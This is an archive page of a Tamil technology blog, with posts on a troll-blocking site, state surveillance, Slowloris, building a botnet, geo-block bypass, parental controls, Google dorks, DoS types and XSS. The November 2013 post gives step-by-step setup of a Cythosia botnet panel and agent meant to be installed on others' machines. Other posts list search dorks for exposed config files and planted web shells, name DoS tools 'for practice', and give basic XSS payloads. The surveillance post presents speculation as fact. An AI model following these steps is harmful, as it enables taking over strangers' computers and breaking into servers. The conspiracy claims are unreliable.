February 21, 2021

ஆன்லைன் அடியாட்களை கையாள்வது எப்படி | Block trolls with crowd sourced platform

Twitter பயன்படுத்தும் பலருக்கு ஆன்லைன் அடியாட்கள் பரிச்சயமாகியிருப்பார்கள். ஆபாசமாக பேசுவது, மிரட்டல்கள் விடுப்பது, அவதூறு செய்வது என நமக்கு மனச்சோர்வை ஏற்படுத்த கீழ்த்தரமாக இறங்கி வேலை செய்துகொண்டிருக்கிற ஒரு கூட்டம். 




நசுக்க, நசுக்க எங்கிருந்தோ வரும் மூட்டைப்பூச்சிகள் போல, வந்துகொண்டே இருப்பார்கள். ஒவ்வொருத்தரையும் ப்ளாக்க, ஆகும் நேரச்செலவும் அதிகம். 

 இந்த அடியாட்களை தடுக்கவும், தவிர்க்கவும் சில மென்பொருட்கள் இருந்தாலும், அதில் Jacob உருவாக்கிய Blocktogether மென்பொருள் மிகவும் பிரபலமானது மற்றும் கோடிக்கனக்கான மக்களால் பயன்படுத்தப்பட்டது. கடந்த மாதம் அந்த சேவை அவரது பணிச்சுமை காரணமாக நிறுத்தப்பட்டு விட்டது. 

 அவரது மென்பொருளில் சில மாற்றங்களுடன் நாம் www.letsblock.in எனும் தளத்தை ஆரம்பித்துள்ளோம்.  ஆரம்பித்த ஒருவாரத்திற்குள்ளாகவே பலர் நமது தளத்தை பயன்படுத்திக்கொண்டிருப்பதில் மிகுந்த மகிழ்ச்சி. மேலும் பலர், இதனை எப்படி பயன்படுத்துவது என கேட்டுக்கொண்டிருப்பதனால் இந்த பதிவு.

 
இந்த தளத்திற்கான அவசியம் தற்போது என்ன?

பல வருடங்களாக ட்விட்டர் பயனாளியாக நான் பார்த்தவரையில் தமிழ் கீச்சர்களிடம் சற்று குரூப்பிசம் இருந்தாலும், ஆபாச தாக்குதல்கள், மிரட்டல்களை சில ஆண்டுகளுக்கு முன் நான் அதிகம் பார்த்ததில்லை. இந்த நிலை வேகமாக மாறி வருவதாக எனக்கு சமீபமாக தோன்ற ஆரம்பித்தது. முக்கியமாக எனது நட்பு வட்டத்தில் இருந்த சில பத்திரிக்கையாளர்கள், எழுத்தாளர்கள் குறிவைத்து தாக்கப்படுகின்றனர். இந்த ஆன்லைன் அடியாட்களை ப்ளாக் பண்ணுவது சுலபம் என நினைத்தாலும், அவர்கள் எண்ணிக்கையை பார்க்குபோது, தனிநபராக செயல்டுவதில் உள்ள நேரவிரயத்தை தவிர்க்கவும், ஒரே கருத்துடைய நண்பர்கள் இணைந்து உருவாக்கும் ப்ளாக்லிஸ்ட் அவர்களை மிகவும் சுலபமாக ப்ளாக் பண்ண உதவும் என்பதாலும் இந்த தளத்தை உருவாக்கி இலவசமாக (விளம்பரங்கள் இல்லாமலும்) இதனை தருகிறோம்.

ட்விட்டர் ப்ளாக்கை விட எப்படி இது சிறந்தது?

ட்விட்டர் தளம் ப்ளாக்லிஸ்ட் தறவிரக்கவும் அதை நண்பர்களிடம் பகிர்ந்துகொள்ளவும் வசதிகளை சில ஆண்டுகளுக்கு முன் அறிமுகம் செய்திருக்கிறது. அதில் இருக்கும் ஒரே குறை, லிஸ்டை புதுப்பிக்க ஒவ்வொரு முறையும் தறவிறக்கம் செய்து நண்பர்களுக்கு அனுப்ப வேண்டும். 

LetsBlock.in பயன்படுத்தும் போது, லிஸ்ட் தினமும் தானாகவே புதுப்பிக்கப்படும்.
 
 
எப்படி வேலை செய்கிறது?

இது ஒரு crowd-source மென்பொருள். அதாவது, இதனை பயன்படுத்திக்கொண்டிருக்கும் நண்பர் அவர் ப்ளாக் பண்ணியிருக்கும் நபர்களின் பட்டியலை அவருடைய நண்பர்களுடன் பகிர்ந்து கொள்வதன் மூலம் ப்ளாக்குகள் செயல்படுத்தப்படும். அதிக பயனர்கள் பயன்படுத்தும் போது அதிக "இணைய அடியாட்களை" ப்ளாக் பண்ண முடியும்.


 Letsblock.in தளத்திற்கு சென்று "Login with Twitter" வழியாக தளத்தை பயன்படுத்திக்கொள்ளலாம்.

நண்பர்களின் ப்ளாக்லிஸ்ட்டை "Subscribe" பண்ணுவதன் மூலம் அவர் ப்ளாக் பண்ணிய அனைவரையும் உடனே ப்ளாக் பண்ணலாம்.

விரிவான விளக்கங்களுக்கு இந்த காணொலியை பாருங்கள்.



 
மேலதிக தகவல்கள் அல்லது உதவிக்கு @LetsBlock_IN OR @birianiac


April 14, 2015

உங்களைச்சுற்றி உளவாளிகள் : அரசாங்க கண்காணிப்பு

    நாம் அனைவரும் ஏதோ ஒரு வகையில் தகவல் தொழில்நுட்பத்தோடு பின்னப்பட்டு இருக்கிறோம். தொழில்நுட்பரீதியில் மக்களை கண்காணிப்பது என்பது மிகச்சுலபமாகிவிட்டது.

                      In the overall list of countries spied on by NSA programs, India stands at fifth place, with billions of pieces of information plucked from its telephone and internet networks just in 30 days. File Photo: AP

    நம்ம Facebook, Twitter ல போடுற மொக்கைய கண்காணித்து என்ன பண்ணபோகிறார்கள், நாம் ஒண்ணும் தவறு செய்யவில்லை என நினைக்கலாம். நீங்கள் செய்வது எதுவாக இருந்தாலும், அது குற்றம் என அதிகாரிகளால் மாற்ற முடியும். உங்கள் ஆன்லைன் நண்பரின் ஸ்டேடஸை லைக் செய்ததற்காகவோ, செய்தித்தாளில் வந்ததை Twitter-ல் பகிர்ந்ததற்காகவோ நீங்கள் கைது செய்யப்படலாம்.

அமெரிக்காவின் கண்காணிப்பு:
    அமெரிக்காவின் செப்டம்பர் 11 இரட்டை கோபுர தாக்குதலுக்கு பிறகு, தீவிரவாத செயல்களை கண்காணிக்க உருவாக்கப்பட்டதுதான் PRISM திட்டம். இது 2007-ல் ஆரம்பித்து ஆறு ஆண்டுகள் வரை இரகசியமாக வைக்கப்பட்டிருந்தது. அங்கு பணிபுரிந்த எட்வர்ட் ஸ்நோடன் (Edward Snowden) என்பவரால் ஊடகங்களில் வெளியிடப்பட்டது.



இந்த திட்டத்தின் மூலமாக மக்களின் e-mail, chat, video, VOIP, social network details, browsing history, google search terms ஆகியவற்றை கண்காணித்துக் கொண்டிருந்தது.

 

   இந்த திட்டத்தில் நாம் தினமும் உபயோகிக்கும் பெரும்பாலான சேவை நிறுவனங்கள் இணைக்கப்பட்டன. சேகரிக்கப்படும் தகவல்களை NSA, FBI, CIA, DIA ஐ சேர்ந்த பணியாளர்கள், எந்த நீதிமன்ற உத்தரவுமின்றி உபயோகித்தனர்.

இந்த கண்காணிப்பின் ஆபத்து உணராதவர்களுக்காக ஒரு சம்பவம்.

    மைக்கேல் ஹாஸ்டிங்ஸ் ஒரு 33 வயதான புலனாய்வு பத்திரிக்கையாளர். அவர் எழுதிய "The Runway General" எனும் கட்டுரை அமெரிக்க ஜெனரல் Stanly McCrystal-ன் தவறான போர் உத்திகளையும், ஒபாமா நிர்வாகத்தின் மீது கொண்டிருந்த கிண்டலான அணுகுமுறையையும் வெளியிட்டது. இந்த கட்டுரையின் தாக்கத்தின் காரணமாக, ஜெனரல் Stanly McCrystal தனது பதவியை விட்டு விலகினார்.

    மேலும் அமெரிக்கப் படைகள் ஆப்கானிஸ்தான், பாகிஸ்தான், ஏமன், சோமாலியா போன்ற நாடுகளில், பொதுமக்களை கொல்வதை தனது "The Dirty Wars" புத்தகத்தில் எழுதியிருந்தார். அமெரிக்க படைகளின் சட்டம், மனித உரிமை மீறல்களை தொடர்ந்து வெளிக்கொண்டுவருவதற்கான பணிகளில் ஈடுபட்டிருந்தார்.

    "The Runway General" வெளிவந்து நான்கு மாதங்களுக்கு பிறகு, ஜூலை 18, 2014 அதிகாலை அவருடைய Mercedes Benz C250 Coupe சாலையில் கட்டுப்பாட்டை இழந்து மரத்தில் மோதி வெடித்தது. இந்த விபத்தில் மைக்கேல் ஹாஸ்டிங்ஸ் உயிரிழந்தார்.



    இவரது மரணம் ஊடகங்கள் மத்தியில் பல்வேறு சந்தேகங்களை கிளப்பியது. Mercedes Benz c250 விபத்து சோதனையை ஒருமுறை YouTube ல் பார்த்துவிட்டு இதனை கட்டுரையை தொடருங்கள்.

    ஏற்கெனவே இவரை NSA கண்காணித்துக் கொண்டிருந்தது. Edward Snowden அரசின் கண்காணிப்பு பற்றி வெளியிட்ட பிறகு, அதைக்கண்டு பயந்திருந்தார், இந்த நகரை விட்டு வெளியேற விரும்பினார், என இவரது அண்டை வீட்டுக்காரர் பத்திரிகைக்கு அளித்த பேட்டியில் கூறினார்.

    மைக்கேல் ஹாஸ்டிங்ஸ் மரணமடைவதற்கு சில மணி நேரம் முன்பு விக்கிலீக்ஸ் வழக்கறிஞர் ஜெனிபர் ராபின்சனை தொடர்புகொண்டு, தம்மை FBI விசாரிப்பதாக கூறினார் என்று விக்கிலீக்ஸ், Twitter ல் தெரிவித்திருந்தது.



    FBI, இதை மறுத்தது. மைக்கேல் ஹாஸ்டிங்ஸ் தங்கள் விசாரணையில் இல்லை என தெரிவித்தது. ஆனால் FBI விசாரித்ததற்கான ஆவணத்தை Al-Jazeera வெளியிட்டது.
    தன்னுடைய கார் ஹேக் செய்யப்பட்டுள்ளது என ஹாஸ்டிங்ஸ் நினைத்தார், எனவே அண்டை வீட்டுக்காரர் Volvo காரை மரணத்திற்கு முன்பு கேட்டிருந்தார்.
    இவரது இறுதிக்கட்டுரை இவர் இறந்த பின்னர் வெளியானது. இதில், புஷ் நிர்வாகத்தின்போது கண்காணிப்பை விமர்சித்து வந்த ஒபாமா தற்போது கண்காணிப்பை விரிவாக்கம் செய்வதை விமர்சித்திருந்தார்.

    மைக்கேல் ஹேஸ்டிங்ஸ்ன் மர்மமான மரணத்தைப்போல,  வழக்கறிஞர் Andrew Breitbart, Reddit இணை நிறுவனர் Aron Swartz மரணம் (Aron Swartz FBI விசாரணைக்கு பிறகு வீட்டில் தற்கொலை செய்துகொண்டார்) சர்ச்சைகளைக் கிளப்பியது. NSA தாம் சேகரிக்கும் Meta-data ஐ அடிப்படையாகக் கொண்டு மக்களை கொலை செய்வதாக செய்திகள் வெளிவந்தது.

    இந்திய அரசு பல்வேறு கால கட்டங்களில் பல்வேறு கண்காணிப்பு திட்டங்களை செயல்படுத்தி வந்துள்ளது.
     ஆதார் திட்டத்தை , UIDAAI எனும் அரசு நிறுவனம் செயல்படுத்தி வருகிறது. இந்த திட்டம் 2010 ஆம் ஆண்டு நாடாளுமன்றத்தில் நிராகரிக்கப்பட்டது ஆனால் இந்த திட்டம் எந்த சட்ட வரைவும் இல்லாமல் தற்போது செயல்பட்டு வருகிறது. கைரேகை, கண்விழி போன்ற பயோமெட்ரிக் தகவல்களை சேகரிப்பது, மக்களின் அடிப்படை உரிமைக்கு எதிரானது என "தி இந்து" தெரிவிக்கிறது.  இது மிகப்பெரிய, ஆபத்தான கண்காணிப்பு திட்டம் என வல்லுநர்கள் தெரிவிக்கின்றனர்.
    மக்கள் எந்த வசதியை பெறுவதற்கும் ஆதார் அட்டை கட்டாயமாக்கப்படக் கூடாது. மேலும், தனிநபரின் எழுத்துப்பூர்வ ஒப்புதல் இல்லாமல் தகவல்களை வேறு எவருக்கும் பகிரக் கூடாது என உச்சநீதிமன்றம் உத்தரவிட்டது.
தாங்கள் மற்ற அரசு துறைகளிடம் இருக்கும் அதே தகவல்களைத்தான் சேகரிப்பதாகவும், கூடுதலாக பயோமெட்ரிக் தகவ்ல்களை மட்டுமே சேகரிப்பதாகவும், இந்த அட்டை மக்கள் விரும்பினால் பெற்றுக்கொள்ளலாம் என்றும் UIDAAI தெரிவித்துள்ளது.
    பையோமெட்ரிக் தகவல்களை சேகரிப்பதன் அவசியம் என்ன என்பதை இதுவரை தெளிவுபடுத்தவில்லை. குடிமகன்களுக்கு ஒரே அடையாள அட்டை, இதன் மூலம் சட்டத்திற்கு புறம்பாக நாட்டில் உள்ளவர்கள், தீவிரவாதிகளை ஒழிக்க முடியும் எனவும் பிரச்சாரம் செய்யப்பட்டது.

    Cobrapost, ஆதார் வழங்குதலில் உள்ள குளறுபடிகளையும், லஞ்ச ஊழலையும் பயன்படுத்தி சட்டத்திற்கு புறம்பாக குடியேறிய ஒருவருக்கு ஆதார் அட்டை வாங்கி அம்பலப்படுத்தியது. திட்ட செயல்பாட்டில் இவ்வளவு குளறுபடிகள் என்றால், தொழில்நுட்பம் எவ்வளவு பாதுகாப்பானதென்பதையும், நமது தகவல்களின் பாதுகாப்பை பற்றியும் சிந்திக்க வேண்டும்.

    2011-ம் ஆண்டு CMS (Central Monitoring System) எனும் கண்காணிப்பு திட்டத்தை அறிவித்தது. இதன் மூலமாக Security Agencies, Tax Officials நீதிமன்ற உத்தரவும் இல்லாமல் மின்னஞ்சல், தொலைபேசி அழைப்புகளை கண்காணிக்கப்படுகிறது. இது PRISM போல தானாகவே மின்னஞ்சல், தொலைபேசி அழைப்புகளை கண்காணிப்பதுடன், Facebook, Twitter, Linkedin posts, google search history, location information தகவல்களையும் கண்காணிக்கிறது. மேலும் இந்தியாவில் இருக்கும் அனைத்து Mobile Operatorகளும் LIM (Lawful Intercept and Monitor) எனும் திட்டத்தின் வழியாக, பயனாளிகளின் தொலைபேசி தகவல்களை கண்காணிக்க வழி செய்கிறது.

    NETRA (NEtwork TRaffic Analysis) இன்னொரு புதிய கண்காணிப்பு திட்டம்.  இந்த தொழில்நுட்பம் மூலமாக, பரிமாறிக்கொண்டிருக்கும் தகவல்களை உடனுக்குடன் பரிசீலிக்க முடியும். இது சம்பந்தமான தகவல்கள் வெளியிடப்படாமல் உள்ளன. அரசு தகவல்களை இடைமறிப்பது சட்டப்படி குற்றமாகாது என 1885 Telegraph Act ஆங்கிலேய அரசு இயற்றிய சட்டம் சொல்கிறது. Privacy-க்கு சரியான சட்டம் இல்லாததால், நீதிமன்ற அனுமதி இல்லாமல் அரசால் நம் தகவல்களை உளவு பார்க்க முடிகிறது.

இதிலிருந்து நமது தகவல்களையும் அடையாளத்தையும் பாதுகாத்துக்கொள்வது எப்படி?

-தொடரும்

டிஸ்கி: 66A-ஐ நீதிமன்றம் செல்லாது என அறிவிக்கும் முன் எழுதிய பதிவு.

December 21, 2013

இணைய புரட்சியும் Slowloris-ம்

    முந்தைய பதிவில் Zombie கணிணிகள் பற்றியும் அதன் வழியாக நடத்தப்படும் DDoS தாக்குதல்களையும் பார்த்தோம்.



    ஈரான் தேர்தலின்போது புரட்சியாளர்கள் நடத்திய DDoS தாக்குதல்கள் காரணமாக, ஈரான் மக்கள் யாரும் இணையம் உபயோகிக்க முடியாத அளவுக்கு Bandwidth பாதிக்கப்பட்டது. அந்த நேரத்தில் RSnake என்பவரால் புதிய DoS முறை ஒன்று அறிமுகப்படுத்தப்பட்டது.


   
    Browser-ல் ஒரு இணைய தளத்தை அணுகும் பொழுது உங்கள் கணிணியில் இருந்து HTTP Request ஒன்று வழங்கிக்கு அனுப்பப்படுகிறது. வழங்கி அதனைப்பெற்று அதற்கான Response ஐ உங்கள் கணிணிக்கு அனுப்புகிறது.
    இவ்வாறு ஒரு Request அனுப்பியதில் இருந்து Response வந்து பக்கம் Load ஆகும் வரை உங்கள் கணிணி வழங்கியுடன் இணைப்பில் இருக்கும்(persistent connection).
   
 
    
     Slowloris எனும் மென்பொருளை RSnake இதற்காக வெளியிட்டார். Slowloris பல Partial HTTP Request களை வழங்கிக்கு அனுப்புகிறது. அந்த Keep-Alive நேரம் முடிந்து ஒரு இணைப்பு துண்டிக்கப்படும் முன்னர் அது தொடர்ந்து பல Request களை அனுப்பிக்கொண்டே இருக்கும். இதன் விளைவாக மற்ற பயனர்கள் அந்த இணைய தளத்தை தொடர்புகொள்ள முடியாது.

   DoS ஐ ஒரு போராட்ட வடிவமாக Iran தேர்தல் போராட்டத்திற்கு மக்கள் பயன்படுதினர். அதில் Slowloris பெரும் பங்காற்றியது. மேலும் Iran போராட்டம் பற்றி அறிய https://en.wikipedia.org/wiki/Internet_activism_during_2009_Iranian_election_protests

    Slowloris முதலில் Perl மொழியில் முதலில் எழுதப்பட்டது. இப்பொழுது Windows இயங்கு தளத்திற்கும் இந்த மென்பொருள் கிடைக்கிறது.

மீண்டும் அடுத்த பதிவில் சந்திப்போம்.

November 26, 2013

உங்கள் கணிணியில் ஒரு Red Chip - Botnet

                   
                    உங்கள் கணிணியை E-mail பார்ப்பது,  ஃபேஸ்புக்கில் லைக் போடுவது, ஃபேஸ்புக் போராளிகளோடு சேராமல் இருப்பது என சாதுவாக பயன்படுத்துகிறீர்கள். ஆனால் உங்களுக்கே தெரியாமல் இணைய தளங்களை ஹேக் செய்வது, உங்கள் வங்கிக்கணக்கு, கடவுச்சொல்லை திருடுவது, உங்கள் செயல்பாடுகளை வேவுபார்ப்பது போன்ற செயல்பாடுகள் செய்யவைக்கப்படலாம்.

                    இப்படி ஹேக்கர்களால் வசப்படுத்தப்பட்ட கம்ப்யூட்டர்கள், Zombie (அ) Bot என்று அழைக்கப்படுகின்றன. பல Zombie கணிப்பொறிகள் இணைந்தது Botnet என்று அழைக்கப்படுகிறது.


                    Botnet கள் பெரும்பாலும் DDoS க்காக கட்டமைக்கப்பட்டாலும், Zombie களை கணிணியிலிருந்து கோப்புகளை பதிவேற்றம் செய்யவும், Spamming க்காகவும் பயன்படுத்தப்படுகிறது.

                 இது போன்ற ஒரு Botnet கட்டமைப்பை உருவாக்க எத்தனை மாதங்கள் பிடிக்கும்? 

                    வெறும் 15 நிமிடங்கள் போதும், பைசா செலவில்லாமல் நீங்களே ஒன்றை உருவாக்க முடியும். 

The below tutorial is for Educational Purpose only.

                    இதில் Cythosia Botnet மென்பொருள் பயன்படுத்தி எப்படி உருவாக்கப்படுகிறது என்று பார்க்கலாம்.

                     முதலில் Cythosia மென்பொருளை பதிவிறக்கிக் கொள்ளவும். (search & get the download links.) அதில் PHP ல் எழுதப்பட்ட கட்டுப்பாட்டு மென்பொருளும், Agent Builder ம் இருக்கும்.


                    அதில் Webpanel Folder ஐ ஏதாவது இலவச Hosting ல் தரவேற்றம் செய்து கொள்ளவும். அதில் உள்ள "dump.sql" ஐ ஒரு Database உருவாக்கி அதில் Restore செய்து கொள்ளவும்.

  





 

                    உங்கள் Database தகவல்களை Webpanel/admin/inc/config.php கோப்பில் பதியவும்.






                    இப்போது உங்கள் Zombie கட்டுப்பாட்டு மையம் செயல்பட தயாரான நிலையில் உள்ளது,





                    இதன் கடவுச்சொல் admin . இதை மாற்ற index.php ல் இருக்கும் கடவுச்சொல்லை மாற்றவும்.


                    இனி  Builder மூலம் Zombie மென்பொருளை உருவாக்க முடியும்.


                    இனி இந்த மென்பொருளை மற்றவர்களுக்கு அனுப்பி அவர்கள் கணிணியில் அதனை நிறுவ வைப்பதன் மூலமாக அவர்கள் கணிணியை கட்டுப்பாட்டிற்கு கொண்டுவர முடியும்.


                     இதில், ஒரு Hacker கட்டுப்பாட்டில் உள்ள கணிணிகளையும், அவற்றில் ஒரு exe கோப்பை அவர் பதிவிறக்கம் செய்யும் வேலையை கொடுத்துள்ளதையும் பார்க்கலாம்.

                    இது போன்ற மென்பொருட்களை நமது Antivirus ஐ Updated ஆக வைத்திருப்பதனூடாக தடுக்கலாம்.

                    1990 - ல் ஈரான் தேர்தல் போராட்டத்தின் போது, அதன் ஒரு பகுதியாக, ஈராந் அரசியல் தலைவர்களின் இணைய தளங்கள் DDoS தாக்குதல் வழியாக முடக்கப்பட்டன. இதன் அதிகபட்ச Bandwidth உபயோகம் காரணமாக சாதாரண பயனர்கள் பலரும் இணையத்தை பயன்படுத்த முடியாமல் போனது. இதனை தவிர்க்க, அந்த நேரத்தில் குறைவான Bandwidth மூலம் இணையதளத்தை செயலிழக்கச்செய்யும் DoS முறை ஒன்று அறிமுகப்படுத்தப்பட்டது. அது அடுத்த பதிவில்....


May 7, 2013

இந்த தளத்திற்கு உங்களுக்கு அனுமதி இல்லை

                                   வணக்கம் நண்பர்களே..!! தலைப்பை பார்த்ததும் கொஞ்சம் ஷாக் ஆனீர்களா? எனக்கும் அதேதான், ஒரு கார்ட்டூன் வீடியோ பார்க்க ஒரு Website -ஐ திறக்கும் போது.




இது hulu இணைய தளம். இதில் ஒரு கார்ட்டூன் பார்க்கும் போது கண்டதுதான் இந்த அறிவிப்பு.


BBC இணைய தளத்தின் Comedy பிரிவில் உள்ள ஒரு காணொளியை பார்க்கும் போது இதே போல ஒரு அறிவிப்பு.


                                    நமது முந்தய பதிவுகளில் VPN, Ultra Surf பற்றியெல்லாம் பார்த்தோம்.ஒரு சிறிய காமெடி காணொளிக்காக, ஒர் மென்பொருள் தரவிறக்கி பதிய முடியாது. :)
                                    Firefox உபயோகிப்பவர்கள், ஒரு Addon மூலம் IP மாற்றி, உபயோகிக்க முடியும். IP மாற்றிய பின் அதே தளங்கள்,


                                   
                                     இதில் Addon Bar-ல் மாற்றப்பட்ட IP காட்டப்பட்டுள்ளது. இந்த Addon- ஐ https://addons.mozilla.org/en-US/firefox/addon/anonymox/ URL-ல் இருந்து பதிந்து கொள்ளலாம்.

மீண்டும் அடுத்த பதிவில் சந்திப்போம்.


May 5, 2013

தளங்களை கட்டுப்படுத்த (parental control)

                                                இணையந்தின் சில Category தளங்களை சிறுவர்கள் பார்க்காமல் தடை செய்யயும் ஒரு மென்பொருள் பற்றி நாம் இந்த பதிவில் பார்ப்போம். நமது முந்தய பதிவில், OpenDNS பற்றியும் அதன் மூலம் இணைய தளங்களை தடை செய்வது பற்றியும் பார்த்தோம். அதில் உள்ள முக்கிய பிரச்சனை, DNS IP மாற்றி தடையில்லாமல் இணையத்தை உபயோகிக்க முடியும்.
                   Tueagles போன்ற பல மென்பொருள்கள் சிறப்பாக இருந்தாலும், அவை இலவசமாக கிடைப்பதில்லை. (Cracks available !! :))

                   Blue Coat நிறுவனத்தின் இலவச Parental Control மென்பொருள் K9 Web Protection. இதனை நிறுவுவதும், Configure செய்வதும் எளிது. இந்த இணைப்பில் இருந்து உங்களுக்கான இலவச பிரதியை தரவிறக்கம் செய்துகொள்ளலாம்.


                    இதனை நிறுவுவதற்கு License Code தேவை, அது உங்கள் மின்னஞ்சல் முகவரிக்கு இலவசமாக அனுப்பிவைக்கப்படும்.


                மென்பொருளின் Admin பக்கம். இதம் மூலம், மென்பொருளை செயல்படுத்தவோ, தற்காலிகமாக செயலிழக்கவோ செய்ய முடியும்.


                    Default-ஆக மேலே காட்டப்பட்ட தளங்கள் தடை செய்யப்பட்டிருக்கும். இதனை நாம் மாற்றிக்கொள்ள முடியும்.


                   எவ்வளவு நேரம் இணையத்தை பயன்படுத்த வேண்டும் என்பதையும் நிர்ணயித்துக்கொள்ள முடியும்.


                   இதுவரை பார்த்த தளங்களின் தகவல்களை (Logs) பார்த்துகொள்ள முடியும்.


                   தடை செய்த தளத்தை குறிப்பிட்ட நேரம் அனுமதிக்க முடியும்.

இந்த மென்பொருள் பற்றிய சந்தேகங்களுக்கு http://www1.k9webprotection.com/support/faq

மீண்டும் அடுத்த பதிவில் சந்திப்போம்!!

April 23, 2013

கூகுள் தேடலில் பாஸ்வேர்டுகள்-2

                         நமது கடந்த பதிவில் கூகுள் தேடலில் கிடைக்கும் பாஸ்வேர்டுகள் மற்றும் சில sensitive data பற்றி எழுதியிருந்தோம். இந்த பதிவில் அதே போல மேலும் சில தேடல் முடிவுகளை பார்ப்போம்.

                         Directory listing தடை செய்யப்படாத வழங்கிகளில் உள்ள கோப்புகளை நாம் நேரடியாக தரவிறக்கம் செய்துகொள்ள முடியும். இது போன்ற Configuration error இருக்கும் தளங்களை தேட, இது போன்ற குறிச்சொற்களை பயன்படுத்தலாம்.

intitle:index.of ios -site:cisco.com

                         தளங்களின் Database Configuration  போன்ற தகவல்கள் உள்ள கோப்புகளை பயனர்கள் பார்க்க அனுமதி இருக்காது. அது போன்ற கோப்புகளை தேட, இது போன்ற குறிச்சொற்களை பயன்படுத்தலாம்.


filetype:config inurl:web.config inurl:ftp



                         சில தளங்கள் ஏற்கெனவே Hack செய்யப்பட்டு, Backdoor Set செய்யப்பட்டிருக்கும். அந்த backdoor-கள் மூலம் அந்த தளத்தில் உள்ள அனைத்து கோப்புகளையும் பார்க்க முடிவதுடன், அந்த வழங்கியை Email Spoofing போன்ற அனைத்திற்கும் பயன்படுத்திக்கொள்ள முடியும் (We can upload our own Scripts :P ). அது போன்ற சில தளங்களை தேட,

intitle:#k4raeL - sh3LL

intitle:r57shell +uname -bbpress

inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]

                        http://www.exploit-db.com/google-dorks/ -ல் இது போன்ற பல குறிச்சொற்கள் தொகுக்கப்பட்டுள்ளன.

அடுத்த பதிவில் சந்திப்போம்.http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/1.gif


April 18, 2013

DoS Attack வகைகள்

                              நமது முந்தய பதிவில் DoS பற்றி எழுதியிருந்தோம். இந்த பதிவில் DoS வகைகள் அதன் பின்னால் இருக்கும் தொழில்நுட்பம் பற்றி பார்ப்போம்.

                                DoS என்பது வழங்கியின் சேவையை, அலைக்கற்றை, நினைவகம், Processor போன்றவற்றை அதிகமாக பயன்படுத்தி (Over Load) அதன் மூலம் மற்ற பயனர்களுக்கு வழங்கியின் சேவையை தடை செய்வது என்பது நாம் அறிந்ததே.

ICMP Flood:

http://www.ddosprotection.net/wp-content/uploads/2013/03/icmp-flood.jpg
                               இதில் அதிகமான Ping request-களை அனுமதிக்கப்பட்டதை விட அதிக Load உடன் அனுப்புவர். அந்த ICMP packet களில் Source address (அனுப்புநர் IP) மாற்றப்பட்டிருக்கும். எனவே, அதற்கான பதில் தகவல் (Reply) அனுப்புநருக்கு வராது. இது பற்றிய விளக்கப்படம்..







http://cdn.aiotestking.com/wp-content/ec-council/files/2012/04/312-50-E20-442x400.png

 
SYN Flood:

http://flylib.com/books/3/500/1/html/2/images/1587052083/graphics/15fig02.gif
                                "TCP three way hand shake" என்பது ஒரு வழங்கியுடன் இணைப்பை ஏற்படுத்த நீங்கள் ஒரு request அனுப்புகிறீர்கள், அது SYN, அதற்கு வழங்கியிடமிருந்து பதில் வருகிறது, அது SYN+ACK அதன் பின்னர் நீங்கள் இணைப்பை உறுதி செய்கிறீர்கள், அது ACK. இதன் பின்னர் வழங்கியுடன் உங்கள் தகவல் பரிமாற்றம் நடைபெறும்.

                                இந்த SYN attack-ல் attacker கணிணியிலிருந்து SYN Request மட்டும் தொடர்ந்து அனுப்பப்படும், எனவே வழங்கியின் "Listen Queue" -ல் எளிதில் அனுமதிக்கப்பட்ட அளவு request -களால் நிரம்பிவிடும், அதன் பின்னர் வரும் பயனர்களின் request-களுக்கு தகவல் பரிமாற்றம் நடைபெறாது.

Reflected Attack:

http://www.digitalthreat.net/wp-content/uploads/2009/08/reflected-dos.jpg

                                இதில் attacker வழங்கியிலிருந்து அனுப்புவது போல (Forged) அனுப்புநர் IP மாற்றப்பட்டு முடிந்த வரை எல்லா கணிணிகளுக்கும் request அனுப்பப்படும். அதிலிருந்து வரும் பதில் (Reply) அனைத்தும் வழங்கிக்கு வந்து அதனை தற்காலிகமாக செயலிழக்கச் செய்யும்.

Application Level Attacks:

                                இதில் வழங்கியின் வன்பொருட்கள் (memory, processor,..) resource - ஐ பயன்படுத்தி செயற்படாமல் செய்வதற்கு பதிலாக, அதில் இயங்கும் மென்பொருளை தொடர்ந்து தகவல்களை உள்ளிடுவது போன்றவற்றால் செயல்படாமல் இருக்கச் செய்வது. இதில் மென்பொருள் என்பது, Drupal, Wordpress, Forum scripts, போன்றவற்றை எடுத்துக்காட்டுகளாக கொள்ளலாம். இது போன்ற ஒரு attack யாஹீ மின்னஞ்சல் சேவையில் நிகழ்த்தப்பட்டது.

Permanent DoS:

                             இது மற்ற DoS attacks போல வழங்கியின் சேவையை தற்காலிகமாக தடை செய்யாமல் நிரந்தரமாக வழங்கியின் மென் பொருளையோ, வன் பொருளையோ செயலிழக்கச் செய்வதாகும். எடுத்துக்காட்டாக, வன்பொருட்களை பொருத்தவரைஅதன் இயங்குதள (Firmware) மென்பொருட்களில் Malicious codes-ஐ உட்புகுத்தி அதனி செயலிழக்கச்செய்வது போன்றவை இந்த வகையில் அடங்கும்.

Tools for Practice:
(Strictly for educational purposes only)

1. LOIC
2.HOIC
3.DoSHTTP
4.PHPDoS
5.#refref (perl)
6.Sprut.

Pl post your commands, It will encourage me to write more ;)



June 21, 2011

Cross Site Scripting (XSS)

   நாம் இந்த பதிவில் Cross Site Scripting எனும் XSS attack பற்றி பார்க்கப்போகிறோம்.

ஒரு எடுத்துக்காட்டாக, Search Bar-ல் ஒரு Script -ஐ கொடுத்து தேடும் பொழுது அதற்கான தேடல் முடிவுகள் வருவதற்கு பதிலாக, அந்த Script Run -ஆகி Output வந்தால் அந்த தளம் XSS Vulnerable என்று கொள்ளலாம்.
இதற்கு காரணம், அந்த அப்ளிகேஷன் நீங்கள் கொடுக்கிற ஊள்ளீடை சரியாக Validate and Sanitize செய்யாதது தான். முன்பே சொன்னபடி இவ்வகை தளங்கள் XSS Vulnerable தளங்கள்.


XSS Attack -ல் இரண்டு வகைகள் உள்ளன,
Reflected Attack மற்றொன்று Stored Attack.


Reflected Attack:

     (இதற்கு முன்னதாக DVWA நிறுவிக்கொள்வது புரிந்துகொள்ள எளிதாக இருக்கும்)

இப்போது DWVA-ல் Reflected Attack என்பதை தேர்ந்தெடுங்கள்.


(அல்லது http://testasp.vulnweb.com/search.asp இந்த தளத்திற்கு செல்லவும்.)

அதில்


<script>alert(‘This Site is XSS Vulnerable...!’)</script>



என்று Type செய்து தேடவும்.


This Site is XSS Vulnerable...!

என்று Alert வரும். 

 



<a href="http://knsankar.blogspot.com">Sankar's Blog</a>




என்று Type செய்தால் 


 என்று வரும்.


இதுபோல Malicious Script-களை  run பண்ண வைக்க முடியும்.




Stored Attack:
